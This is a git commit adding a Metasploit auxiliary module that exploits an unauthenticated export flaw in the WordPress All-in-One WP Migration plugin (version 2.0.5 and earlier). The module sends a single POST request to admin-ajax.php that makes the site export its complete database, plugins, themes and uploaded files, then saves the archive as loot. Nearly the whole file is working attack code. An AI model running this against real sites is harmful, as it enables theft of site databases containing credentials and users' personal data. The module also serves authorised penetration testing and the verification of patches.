Add WP All In One Migration export module

2015-07-20 18:13:32 +01:00 · 2015-07-20 18:13:32 +01:00 · f1a909c292
parent 7113c801b1
commit f1a909c292
1 changed files with 68 additions and 0 deletions
--- a/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
+++ b/modules/auxiliary/gather/wp_all_in_one_migration_export.rb
@ -0,0 +1,68 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress All-in-One Migration Export',
+      'Description'     => %q(Due to lack of authenticated session verification
+                              it is possible for unauthenticated users to export
+                              a complete copy of the database, all plugins, themes
+                              and uploaded files.),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'James Golovich',                  # Disclosure
+          'Rob Carr <rob[at]rastating.com>'  # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['WPVDB', '7857']
+        ],
+      'DisclosureDate'  => 'Mar 19 2015'
+    ))
+
+    register_options(
+      [
+        OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])
+      ], self.class)
+  end
+
+  def exporter_url
+    normalize_uri(plugin_url, 'modules', 'export', 'templates', 'export.php')
+  end
+
+  def check
+    check_plugin_version_from_readme('all-in-one-wp-migration', '2.0.5')
+  end
+
+  def run
+    print_status("#{peer} - Requesting website export...")
+    res = send_request_cgi(
+      {
+        'method'    => 'POST',
+        'uri'       => wordpress_url_admin_ajax,
+        'vars_get'  => { 'action' => 'router' },
+        'vars_post' => { 'options[action]' => 'export' }
+      }, datastore['MAXTIME'])
+
+    if res.nil?
+      print_error("#{peer} - No response from the target")
+      return
+    elsif res.code != 200
+      print_error("#{peer} - Server responded with status code #{res.code}")
+      return
+    end
+
+    store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup')
+    print_good("#{peer} - Backup archive saved to #{store_path}")
+  end
+end